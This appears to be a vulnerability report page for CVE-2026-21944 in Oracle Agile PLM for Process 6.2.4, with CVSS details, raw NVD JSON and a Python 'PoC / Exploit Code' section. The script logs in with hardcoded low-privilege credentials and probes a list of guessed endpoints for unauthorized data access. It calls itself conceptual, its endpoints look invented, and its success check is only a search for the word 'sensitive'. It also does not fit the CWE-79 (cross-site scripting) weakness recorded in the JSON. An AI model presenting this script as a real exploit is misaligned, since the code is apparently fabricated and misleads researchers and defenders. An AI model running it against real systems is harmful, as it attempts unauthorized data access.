Security Vulnerability Report
中文
CVE-2026-21944 CVSS 6.5 MEDIUM

CVE-2026-21944

Published: 2026-01-20 22:15:57
Last Modified: 2026-01-29 20:47:57
Source: [email protected]

Description

Vulnerability in the Oracle Agile Product Lifecycle Management for Process product of Oracle Supply Chain (component: Product Quality Management). The supported version that is affected is 6.2.4. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Agile Product Lifecycle Management for Process. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Agile Product Lifecycle Management for Process accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.4:*:*:*:*:*:*:* - VULNERABLE
Oracle Agile Product Lifecycle Management for Process 6.2.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
''' CVE-2026-21944 PoC - Oracle Agile PLM for Process 越权访问 Note: This is a conceptual PoC for demonstration purposes only. Requires proper authorization and ethical testing. ''' import requests import sys target = "https://target-oracle-agile-plm.com" # 低权限用户认证 def authenticate_low_privilege(): session = requests.Session() login_url = f"{target}/Agile/PLMServlet" credentials = { 'username': 'low_privilege_user', 'password': 'password123' } response = session.post(login_url, data=credentials) return session if response.status_code == 200 else None # 尝试越权访问产品质量管理数据 def exploit_unauthorized_access(session): # 目标端点 - Product Quality Management组件 target_endpoints = [ f"{target}/Agile/ProductQualityManagement/data", f"{target}/Agile/PLMServlet?module=quality&action=list", f"{target}/Agile/api/quality/auditRecords", f"{target}/Agile/quality/reports/download" ] for endpoint in target_endpoints: try: response = session.get(endpoint, timeout=10) if response.status_code == 200 and 'sensitive' in response.text.lower(): print(f"[+] Potential unauthorized access at: {endpoint}") print(f"[+] Response length: {len(response.text)}") return True except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") return False if __name__ == "__main__": print("CVE-2026-21944 Exploitation Test") session = authenticate_low_privilege() if session: print("[+] Authenticated successfully") exploit_unauthorized_access(session) else: print("[-] Authentication failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21944", "sourceIdentifier": "[email protected]", "published": "2026-01-20T22:15:57.267", "lastModified": "2026-01-29T20:47:56.817", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Agile Product Lifecycle Management for Process product of Oracle Supply Chain (component: Product Quality Management). The supported version that is affected is 6.2.4. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Agile Product Lifecycle Management for Process. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Agile Product Lifecycle Management for Process accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)."}, {"lang": "es", "value": "Vulnerabilidad en el producto Oracle Agile Product Lifecycle Management para Process de Oracle Supply Chain (componente: Product Quality Management). La versión compatible que está afectada es 6.2.4. Una vulnerabilidad fácilmente explotable permite a un atacante con pocos privilegios y acceso a la red vía HTTP comprometer Oracle Agile Product Lifecycle Management para Process. Los ataques exitosos de esta vulnerabilidad pueden resultar en acceso no autorizado a datos críticos o acceso completo a todos los datos accesibles de Oracle Agile Product Lifecycle Management para Process. Puntuación base CVSS 3.1 de 6.5 (Impactos en la confidencialidad). Vector CVSS: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 4.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.4:*:*:*:*:*:*:*", "matchCriteriaId": "4F85AABE-B854-4887-A641-2102D355F9E3"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpujan2026.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.